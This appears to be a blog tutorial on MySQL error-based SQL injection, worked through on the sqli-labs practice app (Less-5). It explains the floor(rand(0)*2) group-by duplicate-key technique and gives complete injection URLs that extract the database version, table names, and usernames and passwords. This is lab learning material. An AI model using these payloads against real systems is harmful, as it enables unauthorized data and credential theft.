SQL Injection (6)
2022-08-02 03:25:00 【CHIAJ176】
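GET error-based injection
Introduction to error-based injection
Formally, error-based injection consists of two nested queries, i.e. select…(select…). The inner select is called the subquery; it is executed first, and then the outer select runs. Double injection mainly involves the following SQL functions:
rand(): random function, returns a value between 0 and 1
floor(a): rounding function, returns the integer that is less than or equal to a and closest to a
count(): aggregate function, also called the counting function, returns the total number of queried objects
group by clause: grouping function, groups the query results
Displaying specific information through the error message
If rand() is used in a query, its value is computed more than once. When group by is used, floor(rand(0)*2) is evaluated once to look up the group; if the virtual table has no record for that key, it is evaluated again when the row is inserted. In a query over multiple records the values of floor(rand(0)*2) are fixed: 011011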
select count(*) from information_schema.tables group by floor(rand(0)*2);
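The lookup-then-insert behaviour described above, modelled in Python as an added example (not code from the original post and not MySQL's implementation). The function and exception names are made up for the illustration; the key sequence 0,1,1,0,1,1 is the one quoted in the text.

```python
class DuplicateEntry(Exception):
    """Stand-in for MySQL's "Duplicate entry '...' for key" error."""
    def __init__(self, row, key, evaluations):
        super().__init__(f"row {row}: Duplicate entry '{key}' for group key "
                         f"(after {evaluations} evaluations)")
        self.row, self.key, self.evaluations = row, key, evaluations

# Successive values of floor(rand(0)*2), as quoted in the text above.
PAGE_SEQUENCE = [0, 1, 1, 0, 1, 1]

def group_by_count(n_rows, key_values):
    """Simplified model of 'select count(*) ... group by <expr>'.

    key_values supplies successive results of the grouping expression.
    Each row evaluates the expression once to look up its group; on a
    miss the expression is evaluated a second time for the insert.
    Returns (groups, evaluations) or raises DuplicateEntry.
    """
    values = iter(key_values)
    groups = {}                      # the "virtual table": key -> count(*)
    evaluations = 0
    for row in range(1, n_rows + 1):
        key = next(values)           # first evaluation: lookup
        evaluations += 1
        if key in groups:
            groups[key] += 1
            continue
        key = next(values)           # second evaluation: insert
        evaluations += 1
        if key in groups:            # the key changed and now collides
            raise DuplicateEntry(row, key, evaluations)
        groups[key] = 1
    return groups, evaluations

if __name__ == "__main__":
    print(group_by_count(2, PAGE_SEQUENCE))      # two rows: no error
    try:
        group_by_count(3, PAGE_SEQUENCE)         # third row collides
    except DuplicateEntry as err:
        print(err)
    # An expression that returns the same value on both evaluations of a
    # row (constructed sequence) never collides.
    print(group_by_count(4, [0, 0, 1, 1, 0, 1]))
```

The model shows that the error needs at least three rows in the grouped table, and that the text of the error carries the colliding key, which is why the queries below concatenate their subquery result into that key.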
GET single-quote error-based injection
Less 5:
Retrieving the database information
http://localhost/sqli-lab/Less-5/index.php?id= 0' union select 1,2,3 from (select count(*),concat((select concat(version(),0x3a,0x3a,database(),0x3a,0x3a,user(),0x3a) limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a --+
Retrieving the table names
http://localhost/sqli-lab/Less-5/index.php?id= 0' union select 1,2,3 from (select count(*),concat((select concat(table_name,0x3a,0x3a) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a --+
Retrieving the user information
http://localhost/sqli-lab/Less-5/index.php?id= 0' union select 1,2,3 from (select count(*),concat((select concat(username,0x3a, 0x3a,password,0x3a, 0x3a) from security.users limit 1,1),floor(rand(0)*2))x from information_schema.tables group by x)a --+
GET double-quote error-based injection
Change the single quote above to a double quote; nothing else changes.
Sqlmap security testing
Omitted.